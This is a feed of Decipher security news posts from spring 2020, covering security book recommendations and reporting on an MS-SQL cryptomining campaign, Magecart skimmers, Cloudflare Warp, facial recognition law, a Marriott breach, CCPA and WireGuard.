Decipher (https://decipher.sc) is an independent editorial site that takes a practical approach to covering information security. Through news analysis and in-depth features, Decipher explores the impact of the latest risks and provides informative and educational material for readers curious about how security affects our world.

Decipher Library: First Edition
By Dennis Fisher (dennis@decipher.sc), Fri, 03 Apr 2020
https://duo.com/decipher/decipher-book-club-first-edition

Reading is fundamental, and it's one of the few pastimes available to everyone right now that can act as a diversion and bring a little pleasure to daily life. The choice of what to read when it comes to security- and privacy-related books can be overwhelming, with decades of excellent work available, from technical and instructional books to historical accounts, biographies, and fiction. We asked folks in a variety of roles and with a broad range of experiences from across the security community to give us their recommendations, and we've compiled them here for your enjoyment.

Engineering a Safer World, by Nancy Leveson

Usually when asked for a book recommendation, I either go with a book on cognition (like Gary Klein's The Power of Intuition), or with a scifi/fantasy novel (Max Gladstone's Empress of Forever); but today I'm going old-school. Nancy Leveson is the pioneer of the world of complex systems safety, and security in the Internet era is really a subdomain of that. This is a dense book, because it's really a textbook; but its chapters stand alone, and it's required reading for my entire organization, so I give it to y'all as a recommendation. - Andy Ellis, CSO, Akamai

Attacking Network Protocols, by James Forshaw

When my friend James Forshaw asked me to write the foreword to his first book, I was floored. Here was one of the most brilliant minds in security telling me that I had played an important enough role in his life, in his career, that I was the only person he could think of to write it. All I had done, in my mind, was beg my smart friend to please look at the new bug bounties I had created at Microsoft - because even though he’d never looked into hacking IE or defeating Windows mitigations before, only .NET framework, I knew James had it in him to find more. And he did. He made history. I got to call him while shivering outside building 27 to tell him that he was the first recipient of Microsoft’s $100,000 bug bounty. The bounty that would launch a thousand more. This book to me represents friendship, and believing in the potential we see in each other, which is far weightier in this world than the sum of the wonderful words on the pages of any book. - Katie Moussouris, CEO, Luta Security

The Masters of Deception: The Gang That Ruled Cyberspace, by Michele Slatalla and Joshua Quittner

When I was growing up, one of my favorite books about hackers was Masters of Deception about the legendary crew from New York City, MOD, and their feud with the Legion of Doom (LOD). There are many subtle nods to MOD in other popular hacker media such as the classic 1996 movie Hackers, which takes place in NYC. While the book only lightly touches on X.25 hacking techniques, you can always learn a little more in Phrack. Both this book and MOD are important stories in hacker history. - Dino Dai Zovi, head of security, Cash App at Square

How to Measure Anything in Cybersecurity Risk, by Douglas W. Hubbard & Richard Seiersen

Hubbard and Seiersen break down cybersecurity risk in a way that every cybersecurity person should understand. They take advanced concepts, and discuss them in a way that is relatable and applicable to any organization. One of the elements of the book I find most effective is how it dispels myths related to risk calculations and sample sizes needed to make good risk decisions. — Marcus J. Carey, enterprise architect, ReliaQuest, and co-author of Tribe of Hackers: Cybersecurity Advice From the Best Hackers in the World

The Weather Experiment: The Pioneers Who Sought to See the Future, by Peter Moore

This book is a fascinating history of the very gradual process of understanding the weather. The shape of a hurricane is obvious today because of satellites, but was worked out by people writing each other letters containing observations. The existence of weather offices was highly political, and at times defunded for the offense of offering to predict the weather. There's an interesting relationship to cybersecurity, in that it took quite some time to even figure out what was worth observing, and much more time to start to collect, correlate and understand it all. The benefit of all that work wasn't visible at the start. I don't think that we know the shape of a hurricane yet, and our fits and starts at collecting and sharing knowledge might not be capturing the right things, or making it available to the right people. -- Adam Shostack, consultant, and author of Threat Modeling: Designing for Security, co-author of The New School of Information Security

The Code Book, by Simon Singh

Spycraft: The Secret History of the CIA's Spytechs, From Communism to Al-Qaeda, by Robert Wallace, H. Keith Melton, Henry R. Schlesinger

Engineering Trustworthy Systems: Get Cybersecurity Design Right the First Time, by Sami Saydjari

Security Engineering: A Guide to Building Dependable Distributed Systems, by Ross Anderson

I would say a “must read” is The Code Book. This not only gives the history of cryptography but insights into the context of security overall. I recommend my students read Spycraft by Wallace, Melton, and Schlesinger. It isn’t specifically related to cyber, but I tell them to think about the mindset of “No one would ever spend what it would take to break our security” and whether that is a wise position to take. I also can recommend Engineering Trustworthy Systems: Get Cybersecurity Design Right the First Time by Sami Saydjari. It is a real tour-de-force on understanding what goes into building a system with security in mind. Second to the Saydjari book (and a bit older) is Security Engineering by Ross Anderson. -- Gene Spafford, professor of computer science, Purdue University, founder of the Center for Education and Research in Information Assurance and Security (CERIAS), co-author of Practical Unix and Internet Security

The Practice of Network Security Monitoring, by Richard Bejtlich

While an older title, I still regard this book as one of the true legendary works that breaks down both the philosophy of intrusion detection, as well as the tactical elements of architecture, configuration, and operational monitoring. Many books have been written on this topic since (some by the same author), but at the time of its release, there had never been anything remotely close to the level of detail, technical specificity, and accuracy Richard Bejtlich poured into this resource. His experience over many years doing this work shows immediately, and I referred to this book numerous times while in the trenches of a number of organizations' networks. Even today, it's highly recommended as a great background on the subject, especially for newer security analysts, engineers, and architects. - Dave Shackleford, owner of Voodoo Security

The Gift of Fear and Other Survival Signals That Protect Us From Violence, by Gavin De Becker

One of my favorite books about security that is focused on people and behavior rather than computers, but no less useful. Gavin De Becker uses this book to define a list of PINs, or Pre-Incident Indicators, that you can be cognizant of in order to potentially see a bad situation before it happens. While it can be a hard read at times, using real life stories to help backdrop the knowledge in the book, the content can be used to both recognize and mitigate threats often seen in cyberspace as well. — Nick Steele, senior R&D engineer, Duo Labs

The Cuckoo’s Egg, by Clifford Stoll

Published in 1989, The Cuckoo’s Egg is a first-hand account of Stoll’s search for a hacker who infiltrated the Lawrence Berkeley National Laboratory. Long before APTs were classified and monitored, Stoll, who is an astronomer by trade, describes the detective-like methods he used to find the hackers. This story turns into a wild tale of cyber espionage involving the United States intelligence agencies and the KGB. - Vanessa Sauter, senior strategy analyst at Cobalt.io

The Mastermind, by Evan Ratliff

It's the wild true story of Paul Le Roux, a brilliant programmer who went from running a shady network of websites for ordering pharmaceuticals online, to being an international crime kingpin. He had dealings everywhere from the Philippines to Somalia to North Korea, running hard drugs and guns and ordering hits on those who fell out of his favor. Oh, and he may also have written the TrueCrypt file-encryption software that for years was widely used for normal, legitimate purposes. His use of encrypted systems to protect himself and his henchmen demonstrates the futile stupidity of government efforts to ban strong encryption in the name of fighting crime. Criminals already have access to such tools, and smart ones like Le Roux can even roll their own. And, as his eventual downfall illustrates, even crypto-savvy criminals can still be caught. - Riana Pfefferkorn, associate director of surveillance and cybersecurity, Stanford Center for Internet and Society

Intelligence-Driven Incident Response, by Scott J. Roberts and Rebekah Brown

If you want to transition from whack-a-mole detection and response to a strategic incident response program that is fueled by threat intelligence, then this is the book for you. The authors guide you through aligning your incident response and threat intelligence capabilities through the "F3EAD" process: Find, Fix, Finish, Exploit, Analyze, Disseminate. There is also a chapter dedicated to the strategic components of a threat intelligence program, which will help you demonstrate value to your executives and might even justify some budget for your security program. Also, Scott and Rebekah are lovely people and great members of our community. - Rick Holland, CISO and VP, Digital Shadows

The Smart Girl's Guide to Privacy, by Violet Blue

Both my kids were required to read it when they turned 13 and were allowed to create social media accounts. I understand why the book is gender-specific, but I wish there was a version that wasn't. Most of the information in it is good general advice for anyone putting themselves out there on the Internet. Having "girl" in the title makes it a bit more difficult to sell boys (and men) on reading it as well. — Adrian Sanabria, Advocate at Thinkst Applied Research

Neuromancer, by William Gibson

I think I was a freshman or sophomore in high school when a friend handed me Neuromancer. As an introverted kid with an interest in electronics, a not-exactly-above-the-board dial-in to a VAX and a separate SLIP link (look it up kids), as well as copies of 1984 and Animal Farm on my desk, I was fairly well primed to dive into the dizzying prose of William Gibson's Neuromancer. Art imitates life, as the exploits of Case and Molly in this early vision of cyberspace inspired me to become even more deeply interested in what is now called cybersecurity. I followed up reading the novel with t-files pulled from FTP sites and HPCVA boards before search engines worked, and later met kindred spirits online that have become my colleagues, my friends, and my family of choice some 25 years later.

Thankfully, we avoided turning into a deeply unequal, drug-addled corporatocracy where shady organizations deploy AI's on staggering collections of data to manipulate the populace at large (ahem). Gibson's dystopia did have one glimmer of hope: no cell phones. Even if the technology predictions are slightly off, the remarkable level of prescience exhibited by his world-building and the retro-futuristic vibes make Gibson's work essential reading decades later.

NB: I had the opportunity over 15 years ago to talk to Mr. Gibson on the phone as he asked for a realistic hacking scenario for a friend's work. I don't remember if I had the chance to thank him for inspiring my entry into a subculture and my career, but he has my gratitude. -- Adam O’Donnell, Ph.D., principal engineer, Cisco

Data Story: Explain Data and Inspire Action Through Story, by Nancy Duarte

When I look over my bookcase for ones that I would recommend, I can’t help but land on this one. Security professionals are very good at their core competencies. The issue that arises is with the ability of many security practitioners to communicate effectively. What Duarte’s book does is help the reader to do a far better job of wrapping a narrative around data sets for an audience. Data Story steps the reader through the process of humanizing the data so that it can become more relatable for the audience while adding the element of data visualization. By helping the reader become better at telling a story with their data, the book vastly improves a security professional's chances of being understood and having their message heard. An excellent book for anyone looking to improve their skills as a presenter overall. - Dave Lewis, advisory CISO, Duo

Little Brother, by Cory Doctorow

Cory Doctorow writes about four teenagers in San Francisco detained and interrogated by DHS after a terrorist attack on the Bay Bridge and BART. They are eventually released, but they are told their movements and actions will be monitored, which they see as a violation of their civil rights. It’s a YA novel, but the discussion of mass surveillance, cryptography (via a key signing party), and social activism is one that we all need to think about. The industry grapples with the quandary that just because technology can do something doesn’t mean we should do it—and this book illustrates how far things can go. The book is allegedly used as training material for NSA recruits to illustrate how people view surveillance, which is pretty awesome, if true. — Fahmida Y Rashid

Cult of the Dead Cow: How the Original Hacking Supergroup Might Just Save the World, by Joseph Menn

When I first heard that Joe was working on a book about the cDc, my initial reaction was: How on earth is he going to track down all those people, let alone get them to tell their stories on the record? Oh, me of little faith. Not only did he get nearly all of the cDc members to talk, he turned what could have been a by-the-numbers historical biography into a vibrant, vital tale of how a small group of curious, clever, and creative people helped kickstart a revolution that’s still unfolding nearly 40 years later. Many of the people who helped shape the hacker culture that developed in the 1980s and 1990s came from the cDc or other affiliated groups, and their influence has extended from Lubbock, Texas, to Silicon Valley to Capitol Hill, the Pentagon, and the White House. Joe succeeds in conveying the cDc’s mischievous spirit and sense of humor and describing the members’ considerable accomplishments without turning the book into a hagiography. No mean feat, that. - Dennis Fisher

Long Campaign Compromises MS-SQL Servers by the Thousands
By Dennis Fisher (dennis@decipher.sc), Thu, 02 Apr 2020
https://duo.com/decipher/long-campaign-compromises-ms-sql-servers-by-the-thousands

An attack group operating from China has been compromising MS-SQL database servers by the thousands for nearly two years, installing multiple backdoors and remote access trojans on the machines, and eventually mining multiple cryptocurrencies.

The campaign has been ongoing since about May 2018 and has affected organizations in a number of industries in the United States, China, South Korea, India, and Turkey, and some of the servers have been infected multiple times over the course of the campaign. Researchers at Guardicore Labs discovered the campaign and found that while the initial infection vector is quite simple, it has been highly effective for an extended period of time thanks to the large number of MS-SQL Server instances exposed to the Internet with weak credentials.

"This attack campaign, like many others of its kind, is opportunistic - it scans the internet for machines with MS-SQL port (1433) open, and breaches these machines using brute-force. We have not seen any evidence of specific targeting. However, once infected - compromised servers send identifying information to the attacker’s command-and-control server, informing them with the machine’s public IP, geolocation, computer name and CPU model. This data will be used when the attacker sells access to these machines on the dark web," Ophir Harpaz of Guardicore said in an email.

The attackers, named Vollgar by the Guardicore researchers, scan the Internet for those exposed machines, often with already compromised servers that are drafted into service, and then try to brute force the passwords. The next step is making a few changes to the configuration of the compromised server to make it easier to use for future tasks.

“Following these settings changes, the attacker performs a series of steps to make the system as out-of-the-box as possible. For example, the attacker validates that certain COM classes are available – WbemScripting.SWbemLocator, Microsoft.Jet.OLEDB.4.0 and Windows Script Host Object Model (wshom). These classes support both WMI scripting and command execution through MS-SQL, which will be later used to download the initial malware binary. The Vollgar attacker also ensures that strategic files such as cmd.exe and ftp.exe have execution permissions,” Harpaz wrote in an analysis of the attacks.

“Planning ahead, the attacker sets multiple backdoor users on the machine – both in the MS-SQL database context and in that of the operating system. In both cases, the users are added to the administrators group to ‘arm’ them with elevated privileges.”

With all of that done, the attackers then hunt for any other malware on a newly compromised server and remove it. The Vollgar attackers also remove a number of registry values that are used by other attackers to attach malware to legitimate executables, and then install three separate scripts in different places on the machine to be used as downloaders. In a somewhat unusual twist, the attackers are not using a dedicated attack infrastructure, but instead are running their operations from a machine in China that has been compromised by several other attackers. The Guardicore researchers discovered numerous individual backdoors on the machine. Many of the domains involved in the campaign are registered on freely available top-level domains, and the attackers use a web of shell companies and hosting providers to prop up their efforts.

“The attacker held their entire infrastructure on the compromised machine. Among the files was the MS-SQL attack tool, responsible for scanning IP ranges, brute-forcing the targeted database and executing commands remotely. In addition, we found two CNC programs with GUI in Chinese, a tool for modifying files’ hash values, a portable HTTP file server (HFS), Serv-U FTP server and a copy of the executable mstsc.exe (Microsoft Terminal Services Client) used to connect to victims over RDP,” Harpaz said.

Eventually, the attackers get around to installing the cryptominers after installing multiple RATs and various other modules.

“Each RAT module attempts to connect to the CNC server on a different port. Ports we’ve seen include 22251, 9383 and 3213. It is fair to assume that the simultaneous connections are for redundancy in case one of the CNCs is down. The communication between the client and server starts with an initial report of information, then continues with periodic heartbeats once every ten seconds,” Harpaz said.

“The attacker is mining both Monero and an alt-coin named VDS, or Vollar. This is an unusual cryptocurrency, combining elements of Monero (full privacy) and Ethereum (smart contracts), pegged relatively close to the dollar.”

Harpaz said that the Vollgar attackers have infected as many as 3,000 servers a day.

Magecart Sets Sights on the SMB
By Fahmida Y. Rashid (fahmida@decipher.sc), Thu, 02 Apr 2020
https://duo.com/decipher/magecart-sets-sights-on-the-smb

The prolific Magecart group is using new skimmer code to steal payment card numbers from the websites of small- and medium-sized businesses, RiskIQ researchers found.

The new skimmer, dubbed MakeFrame by RiskIQ, uses iframes to harvest payment card details from websites' shopping cart pages, wrote RiskIQ researchers Jordan Herman and Mia Ihm. The code has been used to harvest payment card data from 19 different websites over the past few months. RiskIQ first observed the card-harvesting code on Jan. 24.

“This version of the skimmer is the classic Magecart blob of hex-encoded terms and obfuscated code,” Herman and Ihm wrote. “It is nestled in amongst benign code to blend in and avoid detection.”

There are multiple versions of MakeFrame currently in use, ranging from programs obviously still in development to production-quality code with encrypted obfuscation.

Magecart is the name given to a collection of attack groups RiskIQ has been monitoring since 2015 who steal payment card information from websites' shopping cart pages. The name comes from the fact that many of the victim websites use the Magento e-commerce software. Magecart groups have targeted several major companies over the years, including Ticketmaster and British Airways. While the groups all use similar attack methods, they also have their own areas of specialization or focus. For example, Magecart Group 5 and Magecart Group 12 are known for targeting the supply chain by injecting skimmer code into third-party JavaScript libraries. Individual sites that load those compromised libraries inadvertently wind up running the attack code. This way, the attackers cast a very wide net of victims by compromising only a few libraries.

Magecart Group 5 also appears to be developing tactics to target routers used by public WiFi operators. Magecart Group 12 was behind the attack on advertising provider Adverline. Magecart Group 8 has its own methods, and is believed to have been behind the recent attack on the NutriBullet website.

Magecart Group 7 is the most likely group using the MakeFrame skimmer, RiskIQ said. The researchers drew this conclusion based on the fact that Group 7 has historically targeted SMBs. Group 7 also typically includes existing functionality on the victims' websites in its skimming operations. That includes hosting the attack code directly on the victim's domain. Group 7 previously used similar tactics against kitchen tools and houseware company OXO.

“In some cases, we've seen MakeFrame using compromised sites for all three of its functions — hosting the skimming code itself, loading the skimmer on other compromised websites, and exfiltrating the stolen data,” wrote Herman and Ihm.

The harvested data stays on the victim's server until the attackers are ready to exfiltrate the information. Magecart Group 7 is known to hide stolen data as .php files and then transfer those files to other compromised sites. The researchers were able to identify that one of the servers used for exfiltrating the data belonged to Online SAS, a French cloud computing and web hosting company.

“Each compromised site used for data exfil has also been injected with a skimmer and has been used to host skimming code loaded on other victim sites as well,” the researchers added.

Magecart is constantly innovating and switching its attack methods. "These skimmers are becoming increasingly capable, fulfilling a variety of functions to optimize the work of the operators that deploy them," the researchers wrote.

MakeFrame is just another example of the group's “continued evolution, honing tried-and-true techniques and developing new ones all the time,” the researchers wrote.

Magecart groups tend to be highly active, but the pace of their attacks has increased significantly over the past few weeks, RiskIQ said. Magecart payment skimming attacks have increased by 20 percent since many retailers closed their physical stores and moved operations online over the past month. “With many homebound people forced to purchase what they need online, the digital skimming threat to e-commerce is as pronounced as ever,” Herman and Ihm wrote.

Cloudflare Releases Warp Beta for Windows and macOS
By Dennis Fisher (dennis@decipher.sc), Wed, 01 Apr 2020
https://duo.com/decipher/cloudflare-releases-warp-beta-for-windows-and-macos

One year after introducing the Warp service to accelerate and encrypt mobile Internet connections, Cloudflare is introducing a beta of the service for macOS and Windows.

Warp looks and acts much like a VPN, encrypting traffic from the client to the edge of Cloudflare’s content delivery network (CDN). It uses the company’s DNS service to accelerate requests and leverages Cloudflare’s global CDN to deliver content faster than a normal DNS service might. Last April, Cloudflare announced the beta of Warp for iOS and Android as a feature of the app, but the rollout ran into a long backlog of people sitting on the waiting list for several months.

“We always wanted to build a WARP client for macOS and Windows. We started with mobile because it was the hardest challenge. And it turned out to be a lot harder than we anticipated. While we announced the beta of WARP on April 1, 2019, it took us until late September before we were able to open it up to general availability. We don't expect the wait for macOS and Windows WARP to be nearly as long,” Cloudflare CEO Matthew Prince said.

On Windows and macOS, as on mobile devices, the Warp client uses the WireGuard VPN protocol to secure the traffic from the client to the Cloudflare network. WireGuard’s protocol is designed to be faster and more lightweight than traditional VPN protocols, contributing to the goal of speeding up connections and DNS requests. Warp is not, strictly speaking, a VPN in the vein of products such as PulseSecure or AnyConnect but it provides many of the same features and benefits for users.

“This doesn't just apply to your web browser but to all apps running on your phone. Any unencrypted connections are encrypted automatically and by default. Warp respects end-to-end encryption and doesn’t require you to install a root certificate or give Cloudflare any way to see any encrypted Internet traffic we wouldn’t have otherwise,” Prince said in a post announcing the original release of Warp for mobile.

After the initial beta period for Warp on macOS and Windows, Cloudflare will roll out support for its Warp+ service, which provides a higher level of speed.

“We plan to add WARP+ support in the coming months to allow you to leverage Cloudflare's Argo network for even faster Internet performance. We will provide a plan option for existing WARP+ subscribers to add additional devices at a discount. In the meantime, existing WARP+ users will be among the first to be invited to try WARP for macOS and Windows,” Prince said.

The basic Warp service for both mobile and desktop platforms is free, but there’s a subscription fee for the Warp+ tier of service. Cloudflare plans to develop a client for Linux in the coming months, as well.

Washington Is First State to Regulate Facial Recognition
By Fahmida Y. Rashid (fahmida@decipher.sc), Wed, 01 Apr 2020
https://duo.com/decipher/washington-is-first-state-to-regulate-facial-recognition

As the first state with a law regulating how government agencies can use facial recognition software, Washington provides other states with a blueprint on how—and how not to—tackle the security and privacy questions around the technology.

Facial recognition technology uses a database of known subjects to identify individuals in photographs and videos. Law enforcement agencies and many businesses have embraced the technology, but mounting evidence has shown the technology can be misused in various ways. Several cities, including San Francisco and Oakland, have banned local government agencies from using facial recognition, and some states, including California, Oregon, and New Hampshire, have banned facial recognition from being used with police bodycams. Washington’s law goes further than just bodycams and applies to all public agencies in the state.

Washington’s law, passed March 13 and signed March 31 by Gov. Jay Inslee, established rules governing facial recognition software, such as requiring government agencies to obtain a warrant to run facial recognition scans in investigations, except in the case of emergency. There must be a way to independently test the facial recognition software for “accuracy and unfair performance differences” across skin color, gender, and age. There are also provisions in the legislation requiring training on how to use facial recognition and regular public reporting on how the technology is actually being used. All agencies using facial recognition software to make decisions that produce “legal effects” (meaning decisions that could affect a person’s job, financials, housing, insurance, and education) must have a human review the results, as well.

Microsoft president Brad Smith praised the new regulations in a blog post, calling the law an “early and important model” and “a significant breakthrough.” Smith has previously appealed for a regulatory framework around facial recognition for law enforcement and companies to follow. Banning facial recognition outright over security and privacy concerns doesn’t make sense, Smith has argued, because the technology could be useful in many applications (such as finding missing persons). The new law establishes civil liberty safeguards while preserving the public safety benefits, Smith said.

"This balanced approach ensures that facial recognition can be used as a tool to protect the public, but only in ways that respect fundamental rights and serve the public interest," Smith wrote.

The law did not go far enough to protect marginalized groups, said Jennifer Lee, head of the ACLU of Washington’s Technology and Liberty Project. Agencies could “use face surveillance technology to deny people essential services and basic necessities such as housing, health care, food, and water.” The “human review” specified in the law was not a “sufficient safeguard,” because humans also have biases and cannot provide the necessary oversight over these kinds of critical decisions, Lee said.

It also did not help that the law has no enforcement mechanism to ensure the agencies followed the provisions.

“We will continue to push for a moratorium to give historically targeted and marginalized communities, such as Black and Indigenous communities, an opportunity to decide not just how face surveillance technology should be used, but if it should be used at all,” Lee said in a statement.

The law originally called for a task force to study how government agencies use facial recognition, but Gov. Inslee vetoed that part of the legislation, saying funding was unavailable. Lawmakers should instead solicit advice from local universities, Inslee said. ACLU’s Lee said the veto removed “any semblance of community oversight.”

The law “in no way absolves tech companies of their broader obligations to exercise self-restraint and responsibility in their use of AI,” Smith warned. In the absence of other state laws and federal regulations, technology companies need to voluntarily adopt and implement responsible AI principles, he said.

Facial recognition systems have come under increased scrutiny by lawmakers and privacy advocates recently. An experiment by the American Civil Liberties Union found that Amazon’s Rekognition software incorrectly matched 28 members of Congress with a mugshot database of people arrested for committing a crime. The ACLU also recently sued the federal government demanding more details on how border control agents scan travelers’ faces at the United States border, as well as the government’s plans on expanding its facial recognition programs.

Smith has previously asked Congress to regulate the use of facial recognition technology. Other companies working on facial recognition software have also expressed support for regulation.

“It’s [facial recognition] a perfect example of something that has really positive uses, so you don’t want to put the brakes on it. At the same time there’s lots of potential for abuses of that technology, so you do want regulation,” Amazon CEO Jeff Bezos said last year, according to GeekWire. “Good regulation in this arena would be very welcome I think by all the players.”

While the likelihood of Congress acting anytime soon is low, federal lawmakers have asked law enforcement agencies how the technology is being used and its accuracy. Smith said Washington’s new law was “an early and important model,” and that regulation “will clearly evolve.” The law shows what legislators can do when they stop arguing about whether facial recognition should be used and focus on how it should be used.

“A real-world example for the specific regulation of facial recognition now exists,” Smith said in the blog post. “Some will argue it does too little. Others will contend it goes too far. When it comes to new rules for changing technology, this is the definition of progress.”

<![CDATA[Decipher Podcast: Rich Mogull]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/decipher-podcast-rich-mogull https://duo.com/decipher/decipher-podcast-rich-mogull Tue, 31 Mar 2020 00:00:00 -0400

<![CDATA[Marriott Discloses New Data Breach]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/marriott-discloses-new-data-breach https://duo.com/decipher/marriott-discloses-new-data-breach Tue, 31 Mar 2020 00:00:00 -0400

Two years after disclosing one of the larger data breaches ever, Marriott has notified customers of another incident, this one affecting about 5.2 million people.

The breach involved improper access to a software system that Marriott uses as part of its guest services at franchise properties. Company officials said the information compromised during the breach includes names, addresses, email addresses, company affiliations, birth dates, phone numbers, and some details of victims’ Marriott Bonvoy loyalty accounts. Marriott officials said no passwords, payment card, or passport information was affected by the incident.

“Hotels operated and franchised under Marriott’s brands use an application to help provide services to guests at hotels. At the end of February 2020, the company identified that an unexpected amount of guest information may have been accessed using the login credentials of two employees at a franchise property,” the Marriott statement says.

“The company believes that this activity started in mid-January 2020. Upon discovery, the company confirmed that the login credentials were disabled, immediately began an investigation, implemented heightened monitoring, and arranged resources to inform and assist guests. Marriott also notified relevant authorities and is supporting their investigations.”

Although Marriott officials said that Bonvoy loyalty account passwords were not part of the information compromised in the breach, the company said it would require Bonvoy members affected by the incident to update their passwords.

“If you are a Marriott Bonvoy member and we have determined that your information was involved: We have disabled your existing Marriott Bonvoy password, so when you log in to your Marriott Bonvoy account at Marriott.com, you will be prompted to change your password. You will also be prompted to enable multi-factor authentication to further protect access to your account,” the Marriott notification says.

Marriott sent email notices today to the affected customers and also has set up a dedicated website through which individuals can check to see whether they’re affected. That portal requires people to go through a three-step process to confirm their email addresses and then check the results of their inquiries.

This most recent incident, affecting as many as 5.2 million people, pales in comparison to Marriott’s 2018 breach, which affected more than 500 million customers around the world. That breach was the result of a deep intrusion into the company’s systems and included the theft of a broad range of personal information, including passport numbers and payment card data in some cases.

Marriott is still investigating the breach it disclosed today, so the details of the data affected and the number of people involved may change.

“Although our investigation is ongoing, we currently have no reason to believe that the information involved included Marriott Bonvoy account passwords or PINs, payment card information, passport information, national IDs, or driver’s license numbers,” the company said.

<![CDATA[EFF Says Privacy Loopholes Remain in CCPA]]> fahmida@decipher.sc (Fahmida Y. Rashid) https://duo.com/decipher/eff-says-privacy-loopholes-remain-in-ccpa https://duo.com/decipher/eff-says-privacy-loopholes-remain-in-ccpa Mon, 30 Mar 2020 00:00:00 -0400

California is expected to begin enforcing its new consumer privacy law starting July 1, but the Electronic Frontier Foundation is concerned about all the loopholes that still remain.

California’s privacy law, which took effect in January, is considered to be among the most—if not the most—comprehensive consumer privacy law currently on the books in the United States. The regulations released by the state attorney general on how to implement the law posed a “‘good step forward’ that could have gone further,” EFF staff technologist Bennett Cyphers wrote. The regulations have been modified twice—once in February and again in March—and “some of the worst features of the regulations have been cut,” Cyphers wrote.

However, the current form of the regulations “still falls short of a user-friendly implementation of CCPA,” Cyphers wrote.

The EFF joined a coalition of privacy advocates to send a letter requesting the state attorney-general “to close business-friendly loopholes and make the CCPA an effective, enforceable tool for user privacy,” Cyphers wrote. The signatories to the letter include the EFF, American Civil Liberties Union of California, Campaign for a Commercial-Free Childhood, the Center for Digital Democracy, Common Sense Media’s policy arm Common Sense Kids Action, Consumer Action, the Consumer Federation of America, Media Alliance, Oakland Privacy, and the Privacy Rights Clearinghouse.

Even after the second round of modifications, it is still hard for consumers to exercise their right to opt out of the sale of their personal information, Cyphers noted. At the moment, businesses can ignore the user’s privacy-specific preferences if they were set in the software, such as the “do not track” option in web browsers. The issue centers around the idea of a “clear signal” and whether a user asking to opt out of tracking is also asking to opt out of sale of user data.

Major web browsers have a setting which lets users choose to send “do not track” headers—which tell sites not to collect the user’s data—with all of their web traffic. The privacy coalition’s letter argued that the setting should be treated as a clear signal to the business that the person has opted out of the sale of the information, and that the person should not have to explicitly tell individual businesses not to sell his or her information.

“A business that cannot collect a person’s information cannot sell that information,” the coalition’s letter said. “The greater (do not collect) includes the lesser (do not sell).”

The regulations currently state, in Sec. 315(d)(1): “The privacy control shall require that the consumer affirmatively select their choice to opt-out and shall not be designed with any pre-selected settings.”

The privacy coalition wants to remove the clause about pre-selected settings and make it explicit to businesses that they must treat a request to opt out of tracking as an opt-out of sale, proposing this language: “A business shall treat a ‘Do Not Track’ browsing header as such a choice.”

“Many consumers choose the software they use specifically to reflect their privacy choices,” the letter said. “If a user selects a browser extension or application in order to protect their privacy, they should not also need to select a separate setting in order to enjoy one of the most important privacy protections granted by CCPA, the right to opt out of sale.”

The privacy groups also took exception to the fact that data brokers that did not collect information directly from consumers didn’t have to notify the consumers that they had that information. Under the original regulations, these businesses had to try to notify the consumers of the right to opt out of the sale of the information, but the modifications since then have removed the condition that “efforts needed to be made to notify the consumers.”

“Subsequent modified draft regulations have all but eliminated notice to consumers when their information is collected and sold by data brokers and other entities, many of which consumers have no knowledge of,” the letter stated.

The latest modifications have changed requirements so that data brokers don’t have to notify consumers even if they collect information directly from consumers. “If a business collects information directly from consumers, it should provide robust notice at collection, whether it is a data broker or not,” the letter said. “There is no reason why data brokers—whose business model is particularly pernicious to privacy—who collect information directly from consumers should provide any less notice than other companies who collect information directly from consumers.”

The coalition requested that the attorney general revise the regulations to read: “A business that is registered as a data broker with the Attorney General pursuant to Civil Code section 1798.99.80 et seq. does not need to provide a notice at collection to the consumer if the information is not collected directly from the consumer and the business has included in its registration submission a link to its online privacy policy that includes instructions on how a consumer can submit a request to opt-out.”

EFF’s Cyphers said the changes introduced in the latest modifications “threaten to undermine the intent of the law.”

<![CDATA[WireGuard VPN Added to Linux Kernel]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/wireguard-vpn-added-to-linux-kernel https://duo.com/decipher/wireguard-vpn-added-to-linux-kernel Mon, 30 Mar 2020 00:00:00 -0400

With the sharp increase in the number of people working from home and requiring secure access to remote resources, interest in and usage of VPNs has spiked, as well. So it’s an opportune time for the WireGuard VPN to make its way into the Linux kernel, an addition that will make the technology available by default to millions of Linux users.

WireGuard is a fast, flexible VPN that was designed specifically for Linux implementations, but it has been a third-party addition until now. With the release of Linux 5.6 today, WireGuard is now included in the kernel by default and will make its way into the downstream distributions, as well.

“The last several weeks of 5.6 development and stabilization have been exciting, with our codebase undergoing a quick security audit, and some real headway in terms of getting into distributions,” WireGuard developer Jason Donenfeld said in an announcement of the Linux kernel addition.

WireGuard was developed as a replacement for the heavier and more complex existing VPN protocols such as IPsec and the popular implementations such as OpenVPN. One of the drawbacks of those larger and more complex systems and protocols is that they can be quite difficult to implement and even more difficult to audit or verify. WireGuard is meant to be both high-performance and easy to audit, making it simpler for a single person or small team to dig into.

“Key exchanges, connections, disconnections, reconnections, discovery, and so forth happen behind the scenes transparently and reliably, and the administrator does not need to worry about these details. In other words, from the perspective of administration, the WireGuard interface appears to be stateless,” the original WireGuard technical paper says.

“Firewall rules can then be configured using the ordinary infrastructure for firewalling interfaces, with the guarantee that packets coming from a WireGuard interface will be authenticated and encrypted. Simple and straightforward, WireGuard is much less prone to catastrophic failure and misconfiguration than IPsec.”

As the Linux 5.6 kernel makes its way downstream to the other distributions, more and more users will have access to the WireGuard software. That trickle-down effect generally takes some time as distributions adopt the new release and then users upgrade their machines. In the meantime, the existing compatibility with older versions of some Linux distributions will be maintained.

“We'll also continue to maintain our wireguard-linux-compat backports repo for older kernels. On the backports front, WireGuard was backported to Ubuntu 20.04 (via wireguard-linux-compat) and Debian Buster (via a real backport to 5.5.y),” Donenfeld said in the email announcing the release.

<![CDATA[The Short, Unhappy Lives of Five Zero Days]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/the-short-unhappy-lives-of-five-zero-days https://duo.com/decipher/the-short-unhappy-lives-of-five-zero-days Fri, 27 Mar 2020 00:00:00 -0400

Attacks that exploit zero day vulnerabilities are magnets for attention and headlines but they are relatively rare and make up a tiny percentage of the overall attack landscape. When those attacks are identified, however, they can provide valuable insights for researchers and security teams about attackers’ tactics and targets of choice.

A number of the large technology companies and smaller independent firms have teams that spend their time specifically looking for exploits against zero days, and Google’s Threat Analysis Group is one of the more active teams in that cohort. The TAG regularly discovers and discloses new vulnerabilities in a variety of applications, including Google’s own Chrome browser and Android mobile operating system. In 2019, TAG came across an unusual pattern of attacks from one adversary that included the use of exploits against several zero days.

